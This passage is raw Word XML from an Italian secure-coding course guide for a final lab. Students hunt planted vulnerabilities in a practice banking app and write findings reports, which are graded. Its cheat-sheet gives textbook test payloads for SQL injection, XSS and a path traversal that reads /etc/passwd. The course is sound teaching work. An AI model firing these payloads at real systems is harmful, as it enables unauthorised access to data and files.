      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e aggiungerci:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- 1 vulnerabilità XSS (commenti)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- 1 IDOR su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/fattura/&lt;id&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- 1 path traversal su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/download?file=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- 1 cookie senza HttpOnly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- (Opzionale) 1 CVE in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip-audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">come strumento di scoperta</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I discenti devono trovarne almeno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3 su 5+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="75"/>
    <w:bookmarkStart w:id="76" w:name="X2f63bc40fdb954f635ddae5a15ab05b366b669a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cheat-sheet di campo (distribuito agli studenti a inizio L8)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">🔍 DOVE CERCARE:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection:    form login, form ricerca, qualunque input → query</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                  Test rapido: ' OR '1'='1' --</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">IDOR:             URL con ID numerici (/fattura/42)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                  Test: cambia l'ID, vedi se accedi</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS:              campi che vengono rivisualizzati (commenti, profilo)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                  Test: &lt;script&gt;alert(1)&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Crypto Failures:  apri il DB con DB Browser, vedi le password</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                  In chiaro / MD5 / SHA-1 / bcrypt?</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Path Traversal:   endpoint con parametro filename</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                  Test: ?file=../etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie / Header:  DevTools → Application → Cookies (HttpOnly?)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                  DevTools → Network → Response Headers (HSTS? CSP?)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Supply Chain:     pip-audit -r requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="76"/>
    <w:bookmarkStart w:id="77" w:name="template-del-report-distribuito"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Template del report (distribuito)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Mini Security Report — BancaPiccola</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">**Reviewer**: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">nome cognome</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">**Data**: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">**Tempo speso**: ~80 minuti</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">## Executive Summary</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">In 2-3 frasi: numero vuln, severity più alta, raccomandazione generale.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">## Findings</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">### F-01 — [Titolo descrittivo]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**Severity**: Critical / High / Medium / Low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**Localizzazione**: file:riga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**Categoria OWASP**: A0X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**Norma violata**: GDPR Art. ?</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">**Descrizione**: 2-3 paragrafi.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">**Proof of Concept**:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[comando o screenshot]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">**Fix proposto**:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">```python</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[codice corretto]</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="77"/>
    <w:bookmarkStart w:id="78" w:name="f-02"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">F-02 — …</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="78"/>
    <w:bookmarkStart w:id="79" w:name="f-03"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">F-03 — …</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="79"/>
    <w:bookmarkEnd w:id="80"/>
    <w:bookmarkStart w:id="83" w:name="raccomandazioni-generali"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Raccomandazioni generali</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[opzionale: cose non specifiche a una vuln]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">### Materiali per il docente</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- App vulnerabile pre-preparata e testata (con le 5+ vulnerabilità)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- Stampe del cheat-sheet (1 per studente)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- Template del report (digitale via email/Teams)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- Griglia di valutazione (vedi sezione [Valutazione](#val))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">### Modalità di consegna</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Ogni studente consegna il proprio `report.md` (o `.docx`/`.pdf`) tramite:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- email al docente</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- piattaforma e-learning del corso (se disponibile)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- consegna stampata</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Tempo limite: fine lezione + 24h per chi vuole rifinire.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">### Errori da evitare</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- ❌ Non testare l'app vulnerabile prima della lezione: rischi che qualche vuln non sia sfruttabile</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- ❌ Mettere troppe vulnerabilità (&gt;7): 80 minuti diventano stressanti</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- ❌ Non distribuire il cheat-sheet: chi non sa da dove iniziare blocca</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">---</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;a name="val"&gt;&lt;/a&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">## Valutazione</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">### Griglia (su 100 punti)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| Voce | Peso | Cosa valutare |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|------|------|---------------|</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| **Partecipazione attiva** (L1-L7) | 10 | Presenza + interazione + compiti consegnati |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| **Workshop STRIDE** (L2) | 10 | Qualità minacce identificate, completezza DFD |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| **Lab pratici** (L3-L6) | 20 | Esecuzione corretta di tutti i lab in classe |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| **Compilazione template SECURITY.md** (L7) | 20 | Sezioni 1-2-3.1-3.2 compilate con coerenza |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| **Mini-report finale** (L8) | 40 | Vedi sotto |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">### Sotto-griglia mini-report L8 (su 40 punti)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| Voce | Peso | Note |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|------|------|------|</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| Numero vulnerabilità identificate (≥3) | 8 | 3 = sufficiente, 5+ = ottimo |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| Correttezza tecnica delle PoC | 12 | PoC funziona davvero? |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| Qualità dei fix proposti | 12 | Codice corretto, idiomatico |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| Severity giustificata | 4 | Coerente con impatto reale |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| Categoria OWASP / norma violata | 4 | Mapping corretto |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">### Mappatura voto finale</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| Punteggio | Voto |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|-----------|------|</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| 90-100 | Eccellente |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| 75-89 | Buono |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| 60-74 | Sufficiente |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| &lt; 60 | Non sufficiente (eventuale recupero) |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">### Modalità di recupero</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Per chi non raggiunge 60:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- Consegna **aggiuntiva**: un secondo mini-report su un'app diversa (vedere `02_lab/M_EXTRA_devsecops_lab/` come riferimento)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- Tempo: 1 settimana</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- Vale max 60/100</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">---</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;a name="all"&gt;&lt;/a&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">## Allegati e materiali distribuibili (riepilogo)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">### Distribuiti durante il corso</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| Lezione | Materiale |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|---------|-----------|</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| L1 | Checklist Secure Coding completa (stampa) |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| L1 | Link a `ss4i/corso-stem-ifts-secure-coding` |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| L7 | Template documentazione + esempio compilato MiniBlog |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| L7 | Guida AI completa |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| L8 | Cheat-sheet di campo (stampa) |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| L8 | Template del report |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">### Setup tecnico richiesto</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">```bash</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># Su ogni PC (verificato in L1)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python --version       # ≥ 3.12</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install flask pytest bcrypt bleach pydantic[email] python-magic-bin requests pip-audit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Browser moderno + DevTools + DB Browser for SQLite.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="81" w:name="risorse-esterne-raccomandate-autostudio"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Risorse esterne raccomandate (autostudio)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1033"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: https://owasp.org/Top10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1033"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Cheat Sheet Series</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: https://cheatsheetseries.owasp.org</w:t>
      </w:r>
